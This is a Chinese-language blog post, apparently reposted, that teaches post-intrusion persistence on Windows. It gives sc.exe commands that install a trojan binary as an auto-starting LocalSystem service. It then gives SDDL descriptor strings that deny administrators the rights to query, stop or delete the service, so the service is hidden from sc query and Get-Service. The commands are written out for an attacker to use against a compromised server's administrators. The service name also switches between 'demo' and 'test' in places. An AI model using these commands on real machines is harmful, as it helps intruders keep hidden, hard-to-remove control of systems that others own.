SC实现隐藏Windows服务维持权限

Posted 巡安似海

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SC实现隐藏Windows服务维持权限相关的知识,希望对你有一定的参考价值。

简介

sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用SC和Powershell程序来隐藏服务,搭到长期维持权限的效果。


创建服务

创建一个服务名为demo的自启动服务,服务运行地址指向马子路径,以tcpip协议传输并以本地系统权限运行

sc create demo start= auto binPath= “cmd.exe /k C:\\tu.exe” depend= Tcpip obj= Localsystem

添加个描述

sc description demo “tu3k.cn”

SC实现隐藏Windows服务维持权限_红蓝对抗

这时服务器重启会自启动上线,手动启动也可以上线,不过有时候手动可能会出错,但是不影响上线。

SC实现隐藏Windows服务维持权限_web_02
成功上线

SC实现隐藏Windows服务维持权限_权限维持_03
删除进程命令sc delete demo
但是管理员在进行维护的时候,发现这个进程可疑,就会查看这个进程的详细信息
SC实现隐藏Windows服务维持权限_网络安全_04
我们的马子路径藏的再隐蔽也一览无余了,接着管理员就会执行命令删掉服务,权限也就掉了,如何藏得更深或者管理员没有这个权限去删呢再或者管理员根本发现不了我们的隐藏马子进程

正文:

隐藏服务

为了不让管理员发现用于权限维持的服务,通过SDDL修改服务的安全描述符,安全描述符是用来配置该服务允许哪些用户权限访问
使用sc程序的sdset模块修改安全描述符

sc.exe sdset test “D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)”

SC实现隐藏Windows服务维持权限_权限维持_05
现在用sc query demo和powershell的get-serivce查询都已经查不到了
不过sc qc demo`还是可以查到,问题已经不大了

SC实现隐藏Windows服务维持权限_网络安全_06


SDDL原理

通过修改安全描述符来控制那些用户具有访问和读取此服务相关信息的权限
sc sdset 有几个参数,D是Access Denied 也就是权限拒绝,刚才执行的语句内就有这个参数
如果要启用的话就把D改成A,A代表Access Alower 允许权限

增强SC的隐藏

在上面的SC中隐藏过后还可以使用`sc qc demo`查看服务信息,这里增强一下,拒绝所有用户权限查询服务配置信息项

sc.exe sdset test “D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)”

SC实现隐藏Windows服务维持权限_web_07

使用Powershell还原权限

powershell.exe & $env:SystemRoot\\System32\\sc.exe sdset auto_calc “D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)”

以上是关于SC实现隐藏Windows服务维持权限的主要内容,如果未能解决你的问题,请参考以下文章

Windows权限维持——计划任务

Windows权限维持-Windows服务

Windows权限维持-Windows服务

后渗透之权限维持——隐藏用户的创建和使用(全程干货)

Windows权限维持

探索基于http.sys实现权限维持